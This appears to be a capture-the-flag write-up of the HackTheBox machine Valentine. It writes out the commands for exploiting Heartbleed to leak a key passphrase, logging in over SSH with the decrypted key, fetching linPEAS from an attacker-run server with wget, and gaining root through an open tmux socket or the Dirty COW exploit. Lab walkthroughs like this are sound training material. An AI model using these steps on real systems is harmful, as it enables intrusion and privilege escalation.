Valentine is a very unique machine which focuses on the Heartbleed vulnerability, which had devastating impact on systems across the globe.
Skills Required:
- Beginner/Intermediate knowledge of Linux
Skills Learned:
- Identifying servers vulnerable to Heartbleed
- Exploiting Heartbleed
- Exploiting permissive tmux sessions
Used Tools:
- Nmap
- Gobuster or Dirsearch
- Searchsploit
- Openssl
1. SCANNING & ENUMERATION
I will start with nmap and the -A parameter to enable OS detection, version detection, script scanning, and traceroute and append the output to tee command which save the in a file named “nmap” and also show the output on the screen.
.png)
We found 3 open ports: 22 → for SSH, 80 → for HTTP, 443 → for HTTPS
We opened the website but nothing appears except a single photo in a full screen mode and it doesn’t hide anything in its source code…
So let’s enumerate the directories of the web application using gobuster…
.png)
We found a directory called dev, encode, decode pages.
So let’s check the dev directory first…
.png)
We found 2 interesting files hype_key and notes.txt, Let’s check notes.txt first…
.png)
The author says it would be nice to fix the encoder/decoder, keep that in mind (and yes, you’d better find another way to take notes, bro 😈).
Let’s check hype_key…
.png)
It contain a bunch of hex-decimals so let’s decode them using Hex to ASCII Text Converter:
After decoding them i found that this is private RSA key encrypted with a pass phrase, We can use it to connect to the server using SSH service…
.png)
So we have to find the pass phrase to decrypt it.
Let’s check the encoder and decoder pages…
/encode:
.png)
Entered “hackthebox”:
.png)
/decode:
.png)
entered “aGFja3RoZWJveA==”
.png)
The purpose of these pages isn’t clear yet, although i spent alot of time in it and found reflected XSS but it couldn’t be useful in our case So we had to find something else…
I couldn’t find any public exploits for any of the OpenSSH and Apache versions so what about the SSL version of port 443 let’s check if it is vulnerable…
I will use nmap scripts to do a full vulnerability scan on the SSL service:
1
nmap — script ssl* -p 443 10.10.10.79
we got a very long list of output but scrolling down i found something very interesting…
.png)
This OpenSSL version is vulnerable to heartbleed which is is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
For more understanding of the vunerability i will refer to this sketch from xkcd comic :
.png)
2. EXPLOITATION
searchsploit heartbleed shows 4 exploits:
.png)
I tried the last one…
1
2
searchsploit -m 32745
python 32745.py 10.10.10.79
.png)
From the internal memory of the server, they pulled out a lineaGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== that someone presumably entered into the decoder. Let’s translate into meaningful text:
We can use base64 to ascii online decoders or the Valentine decoder page or base64 command in linux as:
1
base64 -d <<<”aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==”
.png)
the decoding gives us a hint that it belong to the hype_key which we decode it and found that its an RSA encoded private key, So let’s try to decode it using this pass phrase…
1
openssl rsa -in rsa.key -out rsa_decrypted.key
rsa.key → our private key
rsa_decrypted.key → the output of the openssl
.png)
he asked about the pass phrase and i write it, So let’s check the rsa_decrypted.key file…
.png)
It is finally decrypted.
SSH Connection:
Now we can connect to Valentine via SSH with a clear conscience (the username, by the way, had to be guessed, fortunately it was not difficult):
1
ssh -i rsa_decrypted.key hype@10.10.10.79
.png)
We connected successfully and BOOOOOOOOOOM !!! Now we had a user flag :D
3. PRIVILEGE ESCALATION:
.png)
The kernel version hints at the possibility of using Dirty COW , but we will leave the dirty hacks as a last resort. Let’s run linPEAS which is a script that search for possible paths to escalate privileges on Linux/Unix* hosts:
But first we had to transfer it from our machine to the valentine…
- In Kali:
open python server in the file that contain the linPEAS script
1
python -m SimpleHTTPServer 8080
- In Valentine:
1
wget http://10.10.16.130:8080/linpeas.sh
.png)
Let’s give it the proper permissions and then execute the script…
.png)
As expected a massive amount of information showed up, But one of the best things i like about linPEAS: its coloring system as firstly he said that the red color refers that You must take a look at it as a potential vulnerability and for more the red with yellow background refers that it is 95% a vector.
First at the “Basic Information” part he colored the kernel version with red/yellow, YES i knew it, it is old version and has Dirty COW
.png)
but let’s continue…
STOP !!!!! we found a tmux opened session:
.png)
tmux: this is a utility that allows you to manage terminal sessions, including “freezing” their current state with the possibility of subsequent resumption. What we will do is restore the paused session from the socket /.devs/dev_sess.
We’ll connect with the same command:
1
tmux -S /.devs/dev_sess
Once we typed this command it opened the suspended tmux session with root privileges…
.png)
BOOOOOOOOOOOOOOOOOOOOM!!!!! Now we are root :D
3. PRIVILEGE ESCALATION — Method 2
What about our Dirty COW 😈
Dirty COW Vulnerability simply allows user to write on files meant to be read only.
From the Large number of PoC I found this (based on changing the root entry in /etc/passwd) as the most stable and completely reversible.
Dirty.c allow us to generates a new password hash on the fly and modifies /etc/passwd automatically
First we’ll transfer the dirty.c to the Valentine machine the same way we transfer linPEAS and then compile it…
.png)
1st → We transfered dirty.c
2nd → We compiled dirty.c to run on linux using gcc
3rd → Run ./dirty and it simply do the following:
1- Backup the passwd file to restore it once we finish our attack
2- Create a new user called firefart and ask you to enter his password
3- Update the passwd file with our new user
4- Remind you to restore the original state of the passwd file after escalating your privilege
Now let’s change the user to “firefart”, thereby granting ourselves superuser rights:
.png)
BOOOOOOOOOOOOOOOOOOOOM!!!!! Now we are root :D
Thank you so much for reading and I hope you learned a lot as I did ❤